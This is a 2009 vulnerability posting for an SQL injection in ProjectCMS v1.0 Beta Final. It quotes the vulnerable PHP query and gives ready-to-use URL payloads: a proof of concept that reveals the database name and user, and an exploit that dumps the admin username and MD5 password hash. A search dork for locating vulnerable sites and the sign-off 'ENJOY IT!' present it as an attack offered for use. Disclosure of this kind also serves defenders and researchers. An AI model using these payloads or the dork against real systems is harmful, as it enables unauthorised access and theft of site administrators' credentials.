SQL INJECTION (SQLi) VULNERABILITY--ProjectCMS v1.0 Beta Final-->

2009-05-01T00:00:00
ID SECURITYVULNS:DOC:21756
Type securityvulns
Reporter Securityvulns
Modified 2009-05-01T00:00:00

Description


SQL INJECTION (SQLi) VULNERABILITY--ProjectCMS v1.0 Beta Final-->

CMS INFORMATION:

-->WEB: http://projectcms.org/ -->DOWNLOAD: http://projectcms.org/uploads/projectcms_1.0_BETA.zip -->DEMO: http://projectcms.org -->CATEGORY: CMS / Portal -->DESCRIPTION: ProjectCMS is an open source community project to create a simple content management system with an easy to follow install... -->RELEASED: 2009-04-29

CMS VULNERABILITY:

-->TESTED ON: firefox 3 -->DORK: "Powered by ProjectCMS" -->CATEGORY: SQL INJECTION VULNERABILITY -->AFFECT VERSION: 1.0 Beta Final (maybe <= ?) -->Discovered Bug date: 2009-04-29 -->Reported Bug date: 2009-04-29 -->Fixed bug date: N/A -->Info patch: N/A -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

////////////////////////

SQL INJECTION (SQLi):

////////////////////////

<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>


VULN FILE:

    ...

    $sn=$_GET[&quot;sn&quot;];

    if &#40; $sn == &quot;&quot; &#41; {

            $sn = &quot;1&quot;;
    }

    $sql=&quot;select sn,pagename,linktext,pagecontent,metakeywords,metadescription from $content where sn=&#39;$sn&#39;&quot;;

    $result=mysql_query&#40;$sql,$connection&#41; or die&#40;mysql_error&#40;&#41;&#41;;

    ...

PROOF OF CONCEPT:

http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,user(),5,6/*

Return --> user and database, this last in title ;)


EXPLOIT:

http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,concat(username,0x3A3A3A,password),5,6+FROM+members+WHERE+memberid=1/*

Return --> username:::password (md5 hash) of admin and database (in title too).

<<<-----------------------------EOF---------------------------------->>>ENJOY IT!

*************

ESPECIAL GREETZ TO: Str0ke, JosS, ...

*************

-------------------------------------------------------------------

*************

GREETZ TO: SPANISH H4ck3Rs community!

*************